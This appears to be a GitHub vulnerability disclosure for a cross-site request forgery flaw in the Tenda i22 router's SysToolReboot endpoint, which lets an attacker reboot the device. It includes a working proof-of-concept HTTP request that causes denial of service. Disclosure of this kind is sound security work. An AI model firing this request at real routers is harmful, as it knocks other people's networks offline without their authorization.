Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Tenda i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot

Description

Tenda Router i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot

Firmware information

Affected version

image-20221120101953226

Vulnerability details

This vulnerability lies in the /goform/SysToolReboot page,The details are shown below:

image-20221120141002113

image-20221120141103919

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

POC

This POC can result in a Dos.

GET /goform/SysToolReboot HTTP/1.1
Host: 192.168.204.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; user=; password=vlz1qw
Connection: close


image-20221121105432590